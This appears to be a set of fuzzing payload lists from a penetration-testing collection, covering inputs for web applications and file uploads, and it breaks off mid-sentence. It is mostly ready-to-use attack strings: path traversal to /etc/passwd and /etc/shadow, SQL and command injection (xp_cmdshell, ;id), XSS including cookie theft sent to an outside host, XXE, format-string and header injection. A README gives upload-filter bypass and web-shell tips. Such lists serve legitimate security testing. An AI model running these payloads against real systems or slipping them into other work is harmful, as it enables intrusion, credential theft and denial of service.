..%u2216 ../ ../../../../../../../../../../../../etc/hosts ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/shadow ../../../../../../../../../../../../etc/shadow%00 ..\ ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow / /%00/ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow /' /' /,%ENV,/ /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /.../.../.../.../.../ /../../../../../../../../%2A /../../../../../../../../../../../etc/passwd%00.html /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/shadow^^ /../../../../../../../../bin/id| /..\../..\../..\../..\../..\../..\../boot.ini /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow // //* /etc/passwd /etc/shadow /index.html|id| 0 0 or 1=1 00 0xfffffff 1 1 or 1 in (@@version)-- 1 or 1=1-- 1.0 1; waitfor delay '0:30:0'-- 1;SELECT%20* 1||Utl_Http.request('http://') from dual-- 2 2147483647 268435455 65536 :response.write 111111 ; ; ping 127.0.0.1 ; ;/usr/bin/id\n ;echo 111111 ;id ;id; ;id\n ;id| ;ls -la ;system('/usr/bin/id') ;system('cat%20/etc/passwd') ;system('id') ;|/usr/bin/id| < < script > < / script> SCRIPT]]>alert('XSS');/SCRIPT]]> var n=0;while(true){n++;}]]> << <<< < <>"'%;)(&+ ]>&xxe; ]>&xxe; ]>&xxe; ]>&xxe; SCRIPT]]>alert('XSS');/SCRIPT]]> XSS "> ','')); phpinfo(); exit;/* <IMG SRC="javascript:alert('XSS')"> ]]> %0aBcc: %0aCc: %0d%0aBcc: %0d%0aCc: = =' =-- =; > ?x= ?x=" ?x=> ?x=| @' @' @* @variable A ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| FALSE NULL PRINT PRINT @@variable TRUE XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` ['] ['] \ \";alert('XSS');// \"blah \' \' \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 \0 \00 \00\00 \00\00\00 \0\0 \0\0\0 \\ \\'/bin/cat%20/etc/passwd\\' \\'/bin/cat%20/etc/shadow\\' \\/ \\\\* \\\\?\\ \n/bin/ls -al\n \n/usr/bin/id; \n/usr/bin/id\n \n/usr/bin/id| \nid; \nid\n \nid| \nnetstat -a%\n \t \u003C \u003c \x23 \x27 \x27UNION SELECT \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * \x3C \x3D \x27 \x3D \x3B' \x3c ^' ^' ` `/usr/bin/id` `dir` `id` `perl -e 'print ".%p" x 80'`%n `ping 127.0.0.1` a);/usr/bin/id a);/usr/bin/id; a);/usr/bin/id| a);id a);id; a);id| a)|/usr/bin/id a)|/usr/bin/id; a)|id a)|id; a;/usr/bin/id a;/usr/bin/id; a;/usr/bin/id| a;id a;id; a;id| http:/// id%00 id%00| insert like limit null or or 0=0 # or 0=0 -- or 1=1-- or%201=1 or%201=1 -- response.write 111111 something%00html update x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y xsstest xsstest%00"<>' {'} |/usr/bin/id |/usr/bin/id| |id |id; |id| |ls |ls -la |nid\n |usr/bin/id\n || || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & ||/usr/bin/id; ||/usr/bin/id| } ================================================ FILE: attack/all-attacks/all-attacks-win.txt ================================================ # a wide sample of malicious input for windows targets A TRUE FALSE 0 00 1 -1 1.0 -1.0 2 -2 -20 65536 268435455 -268435455 2147483647 0xfffffff NULL null \0 \00 < script > < / script> %0a %00 +%00 \0 \0\0 \0\0\0 \00 \00\00 \00\00\00 $null $NULL `dir` \nnetstat -a%\n \"blah |dir| ";id" dir%00 dir%00| |dir |dir| |/bin/ls -al ?x= ?x=" ?x=| ?x=> /boot.ini ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| ../../boot.ini /../../../../../../../../%2A %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini ../../../../../../../../conf/server.xml C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini %0d%0aX-Injection-Header:%20AttackValue !@#0%^#0##018387@#0^^**(() %01%02%03%04%0a%0d%0aADSF /,%ENV,/ <!--#exec%20cmd="dir"--> <!--#exec%20cmd="dir"--> % # * } ; / \ \\ \\/ \\\\* \\\\?\\ < < < < < << <<< | || ` - -- *| ^' \' /' @' (') {'} ['] *' #' !' !@#$%%^#$%#$@#$%$$@#$%^^**(() %01%02%03%04%0a%0d%0aADSF \t "\t" #xD #xA #xD#xA #xA#xD /%00/ %00/ %00 xxx

yyy "> < '> '> \";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert "> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()} ' " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ','')); phpinfo(); exit;/* var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> SCRIPT]]>alert('XSS');/SCRIPT]]> ]>&xxe; ]>&xxe; ]>&xxe; ]>&xxe; ]]> <IMG SRC="javascript:alert('XSS')"> XSS ' '-- ' or 1=1-- 1 or 1=1-- ' or 1 in (@@version)-- 1 or 1 in (@@version)-- '; waitfor delay '0:30:0'-- 1; waitfor delay '0:30:0'-- '||Utl_Http.request('http://') from dual-- 1||Utl_Http.request('http://') from dual-- xsstest xsstest%00"<>' )))))))))) ../../../../../../../../../../boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini ../../../../../../../../../../windows/win.ini ..\..\..\..\..\..\..\..\..\..\windows\win.ini || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & | ping -i 30 127.0.0.1 | | ping -n 30 127.0.0.1 | & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ; ping 127.0.0.1 ; %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` ;echo 111111 echo 111111 response.write 111111 :response.write 111111 http:/// %0aCc: %0d%0aCc: %0aBcc: %0d%0aBcc: %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a # known cross platform source Code, file disclosure attack patterns - append after file or dir path %70 .%E2%73%70 %2e0 %2e . \ ?* %20 %00 %2f %5c count(/child::node()) x' or name()='username' or 'x'='y var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> "SCRIPT]]>alert('XSS');/SCRIPT]]>" "" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]]>" "cript:alert('XSS')"">" "" "XSS" %00 NULL null ' " ; "> %0d %0a %7f %ff -1 other %s%p%x%d %99999999999s %08x %20d %20n %20x %20s %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n ================================================ FILE: attack/all-attacks/all-attacks-xplatform.txt ================================================ !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() "><"test@address.com a"b(c)d,e:f;gi[j\k]l@example.com this is"not\allowed@example.com notallowed@example.com notallowed@example.com ================================================ FILE: attack/email/valid-email-addresses.txt ================================================ email@eaddress.com firstname.lastname@address.com email@subdomain.address.com firstname+lastname@address.com name@129.129.129.129 name@[129.129.129.129] 0123456789@address.com email@address-one.com email@address.name email@address.co.jp firstname-lastname@address.com much."more\ unusual"@address.com very.unusual."@".unusual.com@address.com very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com {jacco'vantuijl}@address.server "Jacco\@test"@address.com "Jacco van Tuijl"@address.com "Jacco\\test"@address.com "Jacco@test"@address.com Jacco/van=Tuijl@address.com \$A12345@address.com !def!abc%dfg@address.com _jacco@address.com a.long.email.address.test@dept.address.com "jacco.vantuijl.@.address.com"@address.com jacco@mailserver1 #!$%&'*+-/=?^_`{}|~@address.org "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org " "@address.org üñîçøðé@address.com address@üñîçøðé.com üñîçøðé@üñîçøðé.com ================================================ FILE: attack/file-upload/README.md ================================================ File Upload Fuzzfiles- File Name Filter Bypass Notes see: http://cwe.mitre.org/data/definitions/434.html * kinds of file upload verifications: * content-type * filename extension verificationi (whitelist, blacklist) * file content checking * client side, ha ha ha File notes: **alt-extensions-asp.fuzz.txt** **alt-extensions-coldfusion.fuzz.txt** **alt-extensions-jsp.fuzz.txt** **alt-extensions-perl.fuzz.txt** **alt-extensions-php.fuzz.txt** Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters: **file-ul-filter-bypass-commonly-writable-directories.fuzz.txt**
File directory names that experience has shown are often writable **file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt**
``` {ASPSCRIPT} ``` gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed. **file-ul-filter-bypass-microsoft-asp.fuzz.txt**
this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - ``` {ASPSCRIPT} ``` gets regex replaced. **file-ul-filter-bypass-ms-php.fuzz.txt** **file-ul-filter-bypass-x-platform-php.fuzz.txt**
php on microsoft, cross-platform. use both on ms.
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
``` ``` then regex replace ``` {PHPSCRIPT} ``` in the fuzzfile payload with the name of your .jpg file in the target directory
**invalid-filenames-microsoft.fuzz.txt**
Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
regex replace ``` {EXT} ``` with allowed extension type **file-ul-filter-bypass-x-platform-generic.fuzz.txt**
These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype regex replace ``` {PHPSCRIPT} ``` with your script name
**invalid-filenames-linux.fuzz.txt**
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**invalid-filesystem-chars-microsoft.fuzz.txt**
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts
**Addtl Tips:** **For mod_cgi Server Side Include upload attacks:** ``` ``` or, on Windows
``` ``` Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so, try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile. **example .htaccess entry that sets mime type .jpg to be executable:**
``` AddType application/x-httpd-php .jpg ``` **Encoding Web Shells in PNG IDAT chunks**
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
================================================ FILE: attack/file-upload/alt-extensions-asp.txt ================================================ asp aspx asa aSP aSpx aSa asp%20%20%20 aspx%20%20%20 asa%20%20%20 aSP%20%20%20 aSpx%20%20%20 aSa%20%20%20 asp...... aspx...... asa...... aSP...... aSpx...... aSa...... asp%20%20%20...%20.%20.. aspx%20%20%20...%20.%20.. asa%20%20%20...%20.%20.. aSP%20%20%20...%20.%20.. aSpx%20%20%20...%20.%20.. aSa%20%20%20...%20.%20.. asp%00 aspx%00 asa%00 aSp%00 aSpx%00 aSa%00 ================================================ FILE: attack/file-upload/alt-extensions-coldfusion.txt ================================================ cfm cfml cfc dbm cFm cFml cFc dBm cfm%20%20%20 cfml%20%20%20 cfc%20%20%20 dbm%20%20%20 cFm%20%20%20 cFml%20%20%20 cFc%20%20%20 dBm%20%20%20 cfm...... cfml...... cfc....... dbm...... cFm...... cFml...... cFc...... dBm...... cfm%20%20%20...%20.%20.. cfml%20%20%20...%20.%20.. cfc%20%20%20...%20.%20.. dbm%20%20%20...%20.%20.. cFm%20%20%20...%20.%20.. cFml%20%20%20...%20.%20.. cFc%20%20%20...%20.%20.. dBm%20%20%20...%20.%20.. cfm%00 cfml%00 cfc%00 dbm%00 cFm%00 cFml%00 cFc%00 dBm%00 ================================================ FILE: attack/file-upload/alt-extensions-jsp.txt ================================================ jsp jspx jsw jsv jspf jSp jSpx jSw jSv jSpf jSp%00 jSp%20%20%20 jSp%20%20%20...%20.%20..a jSp...... jSpf%00 jSpf%20%20%20 jSpf%20%20%20...%20.%20..a jSpf...... jSpx%00 jSpx%20%20%20 jSpx%20%20%20...%20.%20..a jSpx...... jSv%00 jSv%20%20%20 jSv%20%20%20...%20.%20..a jSv...... jSw%00 jSw%20%20%20 jSw%20%20%20...%20.%20..a jSw...... jsp%00 jsp%20%20%20 jsp%20%20%20...%20.%20..a jsp...... jspf%00 jspf%20%20%20 jspf%20%20%20...%20.%20..a jspf...... jspx%00 jspx%20%20%20 jspx%20%20%20...%20.%20..a jspx...... jsv%00 jsv%20%20%20 jsv%20%20%20...%20.%20..a jsv...... jsw%00 jsw%20%20%20 jsw%20%20%20...%20.%20..a jsw...... ================================================ FILE: attack/file-upload/alt-extensions-perl.txt ================================================ # .pm .lib cannot be called directly, must be called as modules pl pm cgi pL pM cGi lib lIb cGi%00 cGi%20%20%20 cGi...... cgi%00 cgi%20%20%20 cgi...... lIb%00 lIb%20%20%20 lIb...... lib%00 lib%20%20%20 lib...... pL%00 pL%20%20%20 pL...... pM%00 pM%20%20%20 pM...... pl%00 pl%20%20%20 pl...... pm%00 pm%20%20%20 pm...... ================================================ FILE: attack/file-upload/alt-extensions-php.txt ================================================ phtml php php3 php4 php5 inc pHtml pHp pHp3 pHp4 pHp5 iNc iNc%00 iNc%20%20%20 iNc%20%20%20...%20.%20.. iNc...... inc%00 inc%20%20%20 inc%20%20%20...%20.%20.. inc...... pHp%00 pHp%20%20%20 pHp%20%20%20...%20.%20.. pHp...... pHp3%00 pHp3%20%20%20 pHp3%20%20%20...%20.%20.. pHp3...... pHp4%00 pHp4%20%20%20 pHp4%20%20%20...%20.%20.. pHp4...... pHp5%00 pHp5%20%20%20 pHp5%20%20%20...%20.%20.. pHp5...... pHtml%00 pHtml%20%20%20 pHtml%20%20%20...%20.%20.. pHtml...... php%00 php%20%20%20 php%20%20%20...%20.%20.. php...... php3%00 php3%20%20%20 php3%20%20%20...%20.%20.. php3...... php4%00 php4%20%20%20 php4%20%20%20...%20.%20.. php4...... php5%00 php5%20%20%20 php5%20%20%20...%20.%20.. php5...... phtml%00 phtml%20%20%20 phtml%20%20%20...%20.%20.. phtml...... ================================================ FILE: attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt ================================================ templates_compiled templates_c templates temporary images cache temp files tmp ================================================ FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt ================================================ {ASPSCRIPT} {ASPSCRIPT}.{EXT} {ASPSCRIPT}; {ASPSCRIPT};.{EXT} {ASPSCRIPT}%00 {ASPSCRIPT}%00.{EXT} {ASPSCRIPT}::data%00. {ASPSCRIPT}::data%00.{EXT} ================================================ FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt ================================================ {ASPSCRIPT} {ASPSCRIPT}; {ASPSCRIPT};.jpg {ASPSCRIPT};.pdf {ASPSCRIPT};.html {ASPSCRIPT};.htm {ASPSCRIPT};.txt {ASPSCRIPT};.xyz {ASPSCRIPT};.zip {ASPSCRIPT};.tgz {ASPSCRIPT};.doc {ASPSCRIPT};.docx {ASPSCRIPT};.xls {ASPSCRIPT};.xlsx {ASPSCRIPT}%00.jpg {ASPSCRIPT}%00.pdf {ASPSCRIPT}%00.html {ASPSCRIPT}%00.txt {ASPSCRIPT}%00.xyz {ASPSCRIPT}%00.tgz {ASPSCRIPT}%00.zip {ASPSCRIPT}%00.doc {ASPSCRIPT}%00.docx {ASPSCRIPT}%00 {ASPSCRIPT}::data%00.jpg {ASPSCRIPT}::data%00.pdf {ASPSCRIPT}::data%00.html {ASPSCRIPT}::data%00.txt {ASPSCRIPT}::data%00.zip {ASPSCRIPT}::data%00.doc {ASPSCRIPT}::data%00.xls {ASPSCRIPT}%00%20%20%20 {ASPSCRIPT}%00%20%20%20...%20.%20.. {ASPSCRIPT}%00...... {ASPSCRIPT}%20%20%20 {ASPSCRIPT}%20%20%20...%20.%20.. {ASPSCRIPT}...... {ASPSCRIPT}::data%00%%20%20%20 {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. {ASPSCRIPT}::data%00%...... {ASPSCRIPT}%00%20%20%20;.jpg {ASPSCRIPT}%00%20%20%20;.doc {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc {ASPSCRIPT}%00......;.jpg {ASPSCRIPT}%00......;.doc {ASPSCRIPT}%20%20%20;.jpg {ASPSCRIPT}%20%20%20;.doc {ASPSCRIPT}%20%20%20...%20.%20..;.jpg {ASPSCRIPT}%20%20%20...%20.%20..;.doc {ASPSCRIPT}......;.jpg {ASPSCRIPT}......;.doc {ASPSCRIPT}::data%00%%20%20%20;.jpg {ASPSCRIPT}::data%00%%20%20%20;.doc {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc {ASPSCRIPT}::data%00%......;.jpg {ASPSCRIPT}::data%00%......;.doc ================================================ FILE: attack/file-upload/file-ul-filter-bypass-ms-php.txt ================================================ {PHPSCRIPT} {PHPSCRIPT}.phtml {PHPSCRIPT}.php.html {PHPSCRIPT}.php::$DATA {PHPSCRIPT}.php.php.rar {PHPSCRIPT}.php.rar {PHPSCRIPT}::$DATA ================================================ FILE: attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt ================================================ %00index.html ;index.html %00 ================================================ FILE: attack/file-upload/file-ul-filter-bypass-x-platform-php.txt ================================================ {PHPSCRIPT} {PHPSCRIPT}.phtml {PHPSCRIPT}.php.html {PHPSCRIPT}.php.php.rar {PHPSCRIPT}.php.rar ================================================ FILE: attack/file-upload/invalid-filenames-linux.txt ================================================ / \0 /dev/null /dev/null/foo . .. ================================================ FILE: attack/file-upload/invalid-filenames-microsoft.txt ================================================ A: ZZ: CON PRN AUX CLOCK$ NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9 LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9 * " [ ] : | = , CON.{EXT} PRN.{EXT} AUX.{EXT} CLOCK$.{EXT} NUL.{EXT} COM1.{EXT} COM2.{EXT} COM3.{EXT} COM4.{EXT} COM5.{EXT} COM6.{EXT} COM7.{EXT} COM8.{EXT} COM9.{EXT} LPT1.{EXT} LPT2.{EXT} LPT3.{EXT} LPT4.{EXT} LPT5.{EXT} LPT6.{EXT} LPT7.{EXT} LPT8.{EXT} LPT9.{EXT} *.{EXT} ".{EXT} [.{EXT} ].{EXT} :.{EXT} |.{EXT} =.{EXT} ,.{EXT} ================================================ FILE: attack/file-upload/invalid-filesystem-chars-microsoft.txt ================================================ * . " / \ [ ] : ; | = , ================================================ FILE: attack/file-upload/invalid-filesystem-chars-osx.txt ================================================ # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. # fuzz these into a filename during upload attempts : ================================================ FILE: attack/file-upload/malicious-images/README.md ================================================ From SecLists: ## lottapixel Originally reported at https://hackerone.com/reports/390, addressed on paperclip. A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report: The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS. ## uber.gif Current limits Image size: 1 MB Image dimensions: 2048x2048px File types: jpg/png/gif Another image hack A GIF composed of 40k 1x1 images made Paperclip freeze until timeout. As attachments I sent the file composed of 40k images, and a screenshot of the timeout. ## EICAR File The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus. Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured. The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file. ## xssproject File As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that 